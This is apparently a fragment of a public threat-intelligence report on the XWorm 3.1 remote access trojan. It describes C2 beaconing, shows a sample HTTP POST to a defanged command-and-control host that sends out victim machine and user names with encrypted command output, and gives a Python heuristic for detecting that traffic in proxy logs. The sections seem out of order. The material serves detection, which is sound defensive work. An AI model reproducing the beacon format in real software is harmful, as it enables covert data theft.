Most samples use HTTP or HTTPS for beaconing, but some variants support TCP raw sockets. The typical beacon interval is configurable (default: 10-30 seconds).
The HTTP POST request structure:
POST /index.php HTTP/1.1
Host: badc2[.]com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Content-Type: application/x-www-form-urlencoded

id=base64(ComputerName+Username)&data=AES_encrypted_command_output
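A detection heuristic for the beacon structure above, as an added example that is not the report's code. It assumes a constructed pipe-delimited proxy-log layout and treats a body whose id field is valid base64 of printable text (ComputerName+Username) as the marker, so it keys on request shape rather than on the C2 domain.

```python
import base64
import re

# Added detection example (not the report's code). Assumed, constructed log
# layout: client_ip|method|host|path|user_agent|content_type|body. It matches
# the beacon shape described above (POST /index.php, form-urlencoded,
# id=<base64>&data=<blob>) rather than the C2 domain, which is easy to change.
BEACON_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)"
BODY_RE = re.compile(r"^id=(?P<id>[A-Za-z0-9+/]+={0,2})&data=(?P<data>[^&]+)$")

def decode_victim_id(b64):
    """Decoded id if it is valid base64 of printable ASCII (ComputerName+Username), else None."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    if raw and all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None

def is_beacon_shape(method, path, content_type, body):
    """True when the request has the POST structure the report describes."""
    if method != "POST" or not path.endswith("/index.php"):
        return False
    if content_type != "application/x-www-form-urlencoded":
        return False
    m = BODY_RE.match(body)
    return m is not None and decode_victim_id(m["id"]) is not None

def scan_log(log_text):
    """One finding per matching line: client, contacted host, UA match, decoded id."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split("|")
        if len(fields) != 7:
            continue  # malformed line
        ip, method, host, path, ua, ctype, body = fields
        if is_beacon_shape(method, path, ctype, body):
            victim = decode_victim_id(BODY_RE.match(body)["id"])
            findings.append({"client": ip, "host": host,
                             "ua_match": ua == BEACON_UA, "victim_id": victim})
    return findings

# Constructed sample traffic: one beacon, one benign form POST, one GET.
_VICTIM = base64.b64encode(b"WORKSTATION-01jdoe").decode()  # ComputerName+Username
SAMPLE_LOG = "\n".join([
    f"10.0.0.5|POST|badc2[.]com|/index.php|{BEACON_UA}|application/x-www-form-urlencoded|id={_VICTIM}&data=3q2+7w==",
    f"10.0.0.7|POST|intranet.example|/index.php|{BEACON_UA}|application/x-www-form-urlencoded|user=bob&pass=x",
    f"10.0.0.9|GET|intranet.example|/index.php|{BEACON_UA}|-|-",
])
```

The ua_match flag is informational only: a changed User-Agent string should lower confidence, not suppress the finding.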
Defending against this RAT requires a multi-layered strategy.
Date: October 26, 2023
Classification: Public / TLP:WHITE
Prepared by: Threat Intelligence Unit
It is critical to note that distributing, possessing with intent to use, or deploying XWorm 3.1 against systems without explicit written authorization is a felony under the Computer Fraud and Abuse Act (CFAA) in the US and similar legislation globally (e.g., UK's Computer Misuse Act). Security researchers should only analyze XWorm 3.1 in controlled, isolated lab environments.